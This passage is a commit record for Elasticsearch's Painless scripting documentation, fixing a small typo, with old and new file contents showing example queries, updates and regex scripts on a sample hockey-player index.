lasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,JackyMai\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,mortonsykes\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,nazarewk\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,ZTE-PaaS\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch","old_file":"docs\/reference\/modules\/scripting\/painless.asciidoc","new_file":"docs\/reference\/modules\/scripting\/painless.asciidoc","new_contents":"[[modules-scripting-painless]]\n=== Painless Scripting Language\n\nexperimental[The Painless scripting language is new and is still marked as experimental. The syntax or API may be changed in the future in non-backwards compatible ways if required.]\n\n_Painless_ is a simple, secure scripting language available in Elasticsearch\nby default. It is designed specifically for use with Elasticsearch and can\nsafely be used with `inline` and `stored` scripting, which is enabled by\ndefault.\n\nThe Painless syntax is similar to http:\/\/groovy-lang.org\/index.html[Groovy].\n\nYou can use Painless anywhere a script can be used in Elasticsearch. It is the\ndefault if you don't set the `lang` parameter but if you want to be explicit you\ncan set the `lang` parameter to `painless`.\n\n[[painless-features]]\n[float]\n== Painless Features\n\n* Fast performance: https:\/\/benchmarks.elastic.co\/index.html#search_qps_scripts[several times faster] than the alternatives.\n\n* Safety: Fine-grained whitelist with method call\/field granularity. See\n<<painless-api-reference>> for a complete list of available classes and methods.\n\n* Optional typing: Variables and parameters can use explicit types or the dynamic `def` type.\n\n* Syntax: Extends Java's syntax with a subset of Groovy for ease of use. See the <<modules-scripting-painless-syntax, Syntax Overview>>.\n\n* Optimizations: Designed specifically for Elasticsearch scripting.\n\n[[painless-examples]]\n[float]\n== Painless Examples\n\nTo illustrate how Painless works, let's load some hockey stats into an Elasticsearch index:\n\n[source,js]\n----------------------------------------------------------------\nPUT hockey\/player\/_bulk?refresh\n{\"index\":{\"_id\":1}}\n{\"first\":\"johnny\",\"last\":\"gaudreau\",\"goals\":[9,27,1],\"assists\":[17,46,0],\"gp\":[26,82,1],\"born\":\"1993\/08\/13\"}\n{\"index\":{\"_id\":2}}\n{\"first\":\"sean\",\"last\":\"monohan\",\"goals\":[7,54,26],\"assists\":[11,26,13],\"gp\":[26,82,82],\"born\":\"1994\/10\/12\"}\n{\"index\":{\"_id\":3}}\n{\"first\":\"jiri\",\"last\":\"hudler\",\"goals\":[5,34,36],\"assists\":[11,62,42],\"gp\":[24,80,79],\"born\":\"1984\/01\/04\"}\n{\"index\":{\"_id\":4}}\n{\"first\":\"micheal\",\"last\":\"frolik\",\"goals\":[4,6,15],\"assists\":[8,23,15],\"gp\":[26,82,82],\"born\":\"1988\/02\/17\"}\n{\"index\":{\"_id\":5}}\n{\"first\":\"sam\",\"last\":\"bennett\",\"goals\":[5,0,0],\"assists\":[8,1,0],\"gp\":[26,1,0],\"born\":\"1996\/06\/20\"}\n{\"index\":{\"_id\":6}}\n{\"first\":\"dennis\",\"last\":\"wideman\",\"goals\":[0,26,15],\"assists\":[11,30,24],\"gp\":[26,81,82],\"born\":\"1983\/03\/20\"}\n{\"index\":{\"_id\":7}}\n{\"first\":\"david\",\"last\":\"jones\",\"goals\":[7,19,5],\"assists\":[3,17,4],\"gp\":[26,45,34],\"born\":\"1984\/08\/10\"}\n{\"index\":{\"_id\":8}}\n{\"first\":\"tj\",\"last\":\"brodie\",\"goals\":[2,14,7],\"assists\":[8,42,30],\"gp\":[26,82,82],\"born\":\"1990\/06\/07\"}\n{\"index\":{\"_id\":39}}\n{\"first\":\"mark\",\"last\":\"giordano\",\"goals\":[6,30,15],\"assists\":[3,30,24],\"gp\":[26,60,63],\"born\":\"1983\/10\/03\"}\n{\"index\":{\"_id\":10}}\n{\"first\":\"mikael\",\"last\":\"backlund\",\"goals\":[3,15,13],\"assists\":[6,24,18],\"gp\":[26,82,82],\"born\":\"1989\/03\/17\"}\n{\"index\":{\"_id\":11}}\n{\"first\":\"joe\",\"last\":\"colborne\",\"goals\":[3,18,13],\"assists\":[6,20,24],\"gp\":[26,67,82],\"born\":\"1990\/01\/30\"}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\n[float]\n=== Accessing Doc Values from Painless\n\nDocument values can be accessed from a `Map` named `doc`.\n\nFor example, the following script calculates a player's total goals. This example uses a strongly typed `int` and a `for` loop.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"function_score\": {\n \"script_score\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nAlternatively, you could do the same thing using a script field instead of a function score:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"script_fields\": {\n \"total_goals\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nThe following example uses a Painless script to sort the players by their combined first and last names. The names are accessed using\n`doc['first'].value` and `doc['last'].value`.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"sort\": {\n \"_script\": {\n \"type\": \"string\",\n \"order\": \"asc\",\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"doc['first.keyword'].value + ' ' + doc['last.keyword'].value\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Updating Fields with Painless\n\nYou can also easily update fields. You access the original source for a field as `ctx._source.<field-name>`.\n\nFirst, let's look at the source data for a player by submitting the following request:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"stored_fields\": [\n \"_id\",\n \"_source\"\n ],\n \"query\": {\n \"term\": {\n \"_id\": 1\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nTo change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last\",\n \"params\": {\n \"last\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can also add fields to a document. For example, this script adds a new field that contains\nthe player's nickname, _hockey_.\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last; ctx._source.nick = params.nick\",\n \"params\": {\n \"last\": \"gaudreau\",\n \"nick\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-dates]]\n=== Dates\n\nDate fields are exposed as\n<<painless-api-reference-org-joda-time-ReadableDateTime, `ReadableDateTime`>>s\nso they support methods like\n<<painless-api-reference-org-joda-time-ReadableDateTime-getYear-0, `getYear`>>,\nand\n<<painless-api-reference-org-joda-time-ReadableDateTime-getDayOfWeek-0, `getDayOfWeek`>>.\nTo get milliseconds since epoch call\n<<painless-api-reference-org-joda-time-ReadableInstant-getMillis-0, `getMillis`>>.\nFor example, the following returns every hockey player's birth year:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"script_fields\": {\n \"birth_year\": {\n \"script\": {\n \"inline\": \"doc.born.value.year\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-regex]]\n=== Regular expressions\n\nNOTE: Regexes are disabled by default because they circumvent Painless's\nprotection against long running and memory hungry scripts. To make matters\nworse even innocuous looking regexes can have staggering performance and stack\ndepth behavior. They remain an amazing powerful tool but are too scary to enable\nby default. To enable them yourself set `script.painless.regex.enabled: true` in\n`elasticsearch.yml`. We'd like very much to have a safe alternative\nimplementation that can be enabled by default so check this space for later\ndevelopments!\n\nPainless's native support for regular expressions has syntax constructs:\n\n* `\/pattern\/`: Pattern literals create patterns. This is the only way to create\na pattern in painless. The pattern inside the ++\/++'s are just\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Pattern.html[Java regular expressions].\nSee <<modules-scripting-painless-regex-flags>> for more.\n* `=~`: The find operator return a `boolean`, `true` if a subsequence of the\ntext matches, `false` otherwise.\n* `==~`: The match operator returns a `boolean`, `true` if the text matches,\n`false` if it doesn't.\n\nUsing the find operator (`=~`) you can update all hockey players with \"b\" in\ntheir last name:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last =~ \/b\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nUsing the match operator (`==~`) you can update all the hockey players who's\nnames start with a consonant and end with a vowel:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last ==~ \/[^aeiou].*[aeiou]\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can use the `Pattern.matcher` directly to get a `Matcher` instance and\nremove all of the vowels in all of their last names:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/[aeiou]\/.matcher(ctx._source.last).replaceAll('')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n`Matcher.replaceAll` is just a call to Java's `Matcher`'s\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Matcher.html#replaceAll-java.lang.String-[replaceAll]\nmethod so it supports `$1` and `\\1` for replacements:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/n([aeiou])\/.matcher(ctx._source.last).replaceAll('$1')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nIf you need more control over replacements you can call `replaceAll` on a\n`CharSequence` with a `Function<Matcher, String>` that builds the replacement.\nThis does not support `$1` or `\\1` to access replacements because you already\nhave a reference to the matcher and can get them with `m.group(1)`.\n\nIMPORTANT: Calling `Matcher.find` inside of the function that builds the\nreplacement is rude and will likely break the replacement process.\n\nThis will make all of the vowels in the hockey player's last names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceAll(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nOr you can use the `CharSequence.replaceFirst` to make the first vowel in their\nlast names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceFirst(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n\nNote: all of the `_update_by_query` examples above could really do with a\n`query` to limit the data that they pull back. While you *could* use a\n<<query-dsl-script-query>> it wouldn't be as efficient as using any other query\nbecause script queries aren't able to use the inverted index to limit the\ndocuments that they have to check.\n\n[float]\n[[modules-scripting-painless-dispatch]]\n=== How painless dispatches functions\n\nPainless uses receiver, name, and https:\/\/en.wikipedia.org\/wiki\/Arity[arity]\nfor method dispatch. For example, `s.foo(a, b)` is resolved by first getting\nthe class of `s` and then looking up the method `foo` with two parameters. This\nis different from Groovy which uses the\nhttps:\/\/en.wikipedia.org\/wiki\/Multiple_dispatch[runtime types] of the\nparameters and Java which uses the compile time types of the parameters.\n\nThe consequence of this that Painless doesn't support overloaded methods like\nJava, leading to some trouble when it whitelists classes from the Java\nstandard library. For example, in Java and Groovy, `Matcher` has two methods:\n`group(int)` and `group(String)`. Painless can't whitelist both of them methods\nbecause they have the same name and the same number of parameters. So instead it\nhas <<painless-api-reference-Matcher-group-1, `group(int)`>> and\n<<painless-api-reference-Matcher-namedGroup-1, `namedGroup(String)`>>.\n\nWe have a few justifications for this different way of dispatching methods:\n\n1. It makes operating on `def` types simpler and, presumably, faster. Using\nreceiver, name, and arity means when Painless sees a call on a `def` objects it\ncan dispatch the appropriate method without having to do expensive comparisons\nof the types of the parameters. The same is true for invocations with `def`\ntyped parameters.\n2. It keeps things consistent. It would be genuinely weird for Painless to\nbehave like Groovy if any `def` typed parameters were involved and Java\notherwise. It'd be slow for it to behave like Groovy all the time.\n3. It keeps Painless maintainable. Adding the Java or Groovy like method\ndispatch *feels* like it'd add a ton of complexity which'd make maintenance and\nother improvements much more difficult.\n","old_contents":"[[modules-scripting-painless]]\n=== Painless Scripting Language\n\nexperimental[The Painless scripting language is new and is still marked as experimental. The syntax or API may be changed in the future in non-backwards compatible ways if required.]\n\n_Painless_ is a simple, secure scripting language available in Elasticsearch\nby default. It is designed specifically for use with Elasticsearch and can\nsafely be used with `inline` and `stored` scripting, which is enabled by\ndefault.\n\nThe Painless syntax is similar to http:\/\/groovy-lang.org\/index.html[Groovy].\n\nYou can use Painless anywhere a script can be used in Elasticsearch. It is the\ndefault if you don't set the `lang` parameter but if you want to be explicit you\ncan set the `lang` parameter to `painless`.\n\n[[painless-features]]\n[float]\n== Painless Features\n\n* Fast performance: https:\/\/benchmarks.elastic.co\/index.html#search_qps_scripts[several times faster] than the alternatives.\n\n* Safety: Fine-grained whitelist with method call\/field granularity. See\n<<painless-api-reference>> for a complete list of available classes and methods.\n\n* Optional typing: Variables and parameters can use explicit types or the dynamic `def` type.\n\n* Syntax: Extends Java's syntax with a subset of Groovy for ease of use. See the <<modules-scripting-painless-syntax, Syntax Overview>>.\n\n* Optimizations: Designed specifically for Elasticsearch scripting.\n\n[[painless-examples]]\n[float]\n== Painless Examples\n\nTo illustrate how Painless works, let's load some hockey stats into an Elasticsearch index:\n\n[source,js]\n----------------------------------------------------------------\nPUT hockey\/player\/_bulk?refresh\n{\"index\":{\"_id\":1}}\n{\"first\":\"johnny\",\"last\":\"gaudreau\",\"goals\":[9,27,1],\"assists\":[17,46,0],\"gp\":[26,82,1],\"born\":\"1993\/08\/13\"}\n{\"index\":{\"_id\":2}}\n{\"first\":\"sean\",\"last\":\"monohan\",\"goals\":[7,54,26],\"assists\":[11,26,13],\"gp\":[26,82,82],\"born\":\"1994\/10\/12\"}\n{\"index\":{\"_id\":3}}\n{\"first\":\"jiri\",\"last\":\"hudler\",\"goals\":[5,34,36],\"assists\":[11,62,42],\"gp\":[24,80,79],\"born\":\"1984\/01\/04\"}\n{\"index\":{\"_id\":4}}\n{\"first\":\"micheal\",\"last\":\"frolik\",\"goals\":[4,6,15],\"assists\":[8,23,15],\"gp\":[26,82,82],\"born\":\"1988\/02\/17\"}\n{\"index\":{\"_id\":5}}\n{\"first\":\"sam\",\"last\":\"bennett\",\"goals\":[5,0,0],\"assists\":[8,1,0],\"gp\":[26,1,0],\"born\":\"1996\/06\/20\"}\n{\"index\":{\"_id\":6}}\n{\"first\":\"dennis\",\"last\":\"wideman\",\"goals\":[0,26,15],\"assists\":[11,30,24],\"gp\":[26,81,82],\"born\":\"1983\/03\/20\"}\n{\"index\":{\"_id\":7}}\n{\"first\":\"david\",\"last\":\"jones\",\"goals\":[7,19,5],\"assists\":[3,17,4],\"gp\":[26,45,34],\"born\":\"1984\/08\/10\"}\n{\"index\":{\"_id\":8}}\n{\"first\":\"tj\",\"last\":\"brodie\",\"goals\":[2,14,7],\"assists\":[8,42,30],\"gp\":[26,82,82],\"born\":\"1990\/06\/07\"}\n{\"index\":{\"_id\":39}}\n{\"first\":\"mark\",\"last\":\"giordano\",\"goals\":[6,30,15],\"assists\":[3,30,24],\"gp\":[26,60,63],\"born\":\"1983\/10\/03\"}\n{\"index\":{\"_id\":10}}\n{\"first\":\"mikael\",\"last\":\"backlund\",\"goals\":[3,15,13],\"assists\":[6,24,18],\"gp\":[26,82,82],\"born\":\"1989\/03\/17\"}\n{\"index\":{\"_id\":11}}\n{\"first\":\"joe\",\"last\":\"colborne\",\"goals\":[3,18,13],\"assists\":[6,20,24],\"gp\":[26,67,82],\"born\":\"1990\/01\/30\"}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\n[float]\n=== Accessing Doc Values from Painless\n\nDocument values can be accessed from a `Map` named `doc`.\n\nFor example, the following script calculates a player's total goals. This example uses a strongly typed `int` and a `for` loop.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"function_score\": {\n \"script_score\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nAlternatively, you could do the same thing using a script field instead of a function score:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"script_fields\": {\n \"total_goals\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nThe following example uses a Painless script to sort the players by their combined first and last names. The names are accessed using\n`doc['first'].value` and `doc['last'].value`.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"sort\": {\n \"_script\": {\n \"type\": \"string\",\n \"order\": \"asc\",\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"doc['first.keyword'].value + ' ' + doc['last.keyword'].value\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Updating Fields with Painless\n\nYou can also easily update fields. You access the original source for a field as `ctx._source.<field-name>`.\n\nFirst, let's look at the source data for a player by submitting the following request:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"stored_fields\": [\n \"_id\",\n \"_source\"\n ],\n \"query\": {\n \"term\": {\n \"_id\": 1\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nTo change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last\",\n \"params\": {\n \"last\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can also add fields to a document. For example, this script adds a new field that contains\nthe player's nickname, _hockey_.\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last; ctx._source.nick = params.nick\",\n \"params\": {\n \"last\": \"gaudreau\",\n \"nick\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-dates]]\n=== Dates\n\nDate fields are exposed as\n<<painless-api-reference-org-joda-time-ReadableDateTime, `ReadableDateTime`>>s\nso they support methods like\n<<painless-api-reference-org-joda-time-ReadableDateTime-getYear-0, `getYear`>>,\nand\n<<painless-api-reference-org-joda-time-ReadableDateTime-getDayOfWeek-0, `getDayOfWeek`>>.\nTo get milliseconds since epoch call\n<<painless-api-reference-org-joda-time-ReadableInstant-getMillis-0, `getMillis`>>.\nFor example, the following returns every hockey player's birth year:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"script_fields\": {\n \"birth_year\": {\n \"script\": {\n \"inline\": \"doc.born.value.year\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-regex]]\n=== Regular expressions\n\nNOTE: Regexes are disabled by default because they circumvent Painless's\nprotection against long running and memory hungry scripts. To make matters\nworse even innocuous looking regexes can have staggering performance and stack\ndepth behavior. They remain an amazing powerful tool but are too scary to enable\nby default. To enable them yourself set `script.painless.regex.enabled: true` in\n`elasticsearch.yml`. We'd like very much to have a safe alternative\nimplementation that can be enabled by default so check this space for later\ndevelopments!\n\nPainless's native support for regular expressions has syntax constructs:\n\n* `\/pattern\/`: Pattern literals create patterns. This is the only way to create\na pattern in painless. The pattern inside the ++\/++'s are just\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Pattern.html[Java regular expressions].\nSee <<modules-scripting-painless-regex-flags>> for more.\n* `=~`: The find operator return a `boolean`, `true` if a subsequence of the\ntext matches, `false` otherwise.\n* `==~`: The match operator returns a `boolean`, `true` if the text matches,\n`false` if it doesn't.\n\nUsing the find operator (`=~`) you can update all hockey players with \"b\" in\ntheir last name:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last =~ \/b\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nUsing the match operator (`==~`) you can update all the hockey players who's\nnames start with a consonant and end with a vowel:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last ==~ \/[^aeiou].*[aeiou]\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can use the `Pattern.matcher` directly to get a `Matcher` instance and\nremove all of the vowels in all of their last names:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/[aeiou]\/.matcher(ctx._source.last).replaceAll('')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n`Matcher.replaceAll` is just a call to Java's `Matcher`'s\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Matcher.html#replaceAll-java.lang.String-[replaceAll]\nmethod so it supports `$1` and `\\1` for replacements:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/n([aeiou])\/.matcher(ctx._source.last).replaceAll('$1')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nIf you need more control over replacements you can call `replaceAll` on a\n`CharSequence` with a `Function<Matcher, String>` that builds the replacement.\nThis does not support `$1` or `\\1` to access replacements because you already\nhave a reference to the matcher and can get them with `m.group(1)`.\n\nIMPORTANT: Calling `Matcher.find` inside of the function that builds the\nreplacement is rude and will likely break the replacement process.\n\nThis will make all of the vowels in the hockey player's last names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceAll(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nOr you can use the `CharSequence.replaceFirst` to make the first vowel in their\nlast names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceFirst(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n\nNote: all of the `_update_by_query` examples above could really do with a\n`query` to limit the data that they pull back. While you *could* use a\n<<query-dsl-script-query>> it wouldn't be as efficient as using any other query\nbecause script queries aren't able to use the inverted index to limit the\ndocuments that they have to check.\n\n[float]\n[[modules-scripting-painless-dispatch]]\n=== How painless dispatches functions\n\nPainless uses receiver, name, and https:\/\/en.wikipedia.org\/wiki\/Arity[arity] to\nfor method dispatch. For example, `s.foo(a, b)` is resolved by first getting\nthe class of `s` and then looking up the method `foo` with two parameters. This\nis different from Groovy which uses the\nhttps:\/\/en.wikipedia.org\/wiki\/Multiple_dispatch[runtime types] of the\nparameters and Java which uses the compile time types of the parameters.\n\nThe consequence of this that Painless doesn't support overloaded methods like\nJava, leading to some trouble when it whitelists classes from the Java\nstandard library. For example, in Java and Groovy, `Matcher` has two methods:\n`group(int)` and `group(String)`. Painless can't whitelist both of them methods\nbecause they have the same name and the same number of parameters. So instead it\nhas <<painless-api-reference-Matcher-group-1, `group(int)`>> and\n<<painless-api-reference-Matcher-namedGroup-1, `namedGroup(String)`>>.\n\nWe have a few justifications for this different way of dispatching methods:\n\n1. It makes operating on `def` types simpler and, presumably, faster. Using\nreceiver, name, and arity means when Painless sees a call on a `def` objects it\ncan dispatch the appropriate method without having to do expensive comparisons\nof the types of the parameters. The same is true for invocations with `def`\ntyped parameters.\n2. It keeps things consistent. It would be genuinely weird for Painless to\nbehave like Groovy if any `def` typed parameters were involved and Java\notherwise. It'd be slow for it to behave like Groovy all the time.\n3. It keeps Painless maintainable. Adding the Java or Groovy like method\ndispatch *feels* like it'd add a ton of complexity which'd make maintenance and\nother improvements much more difficult.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} 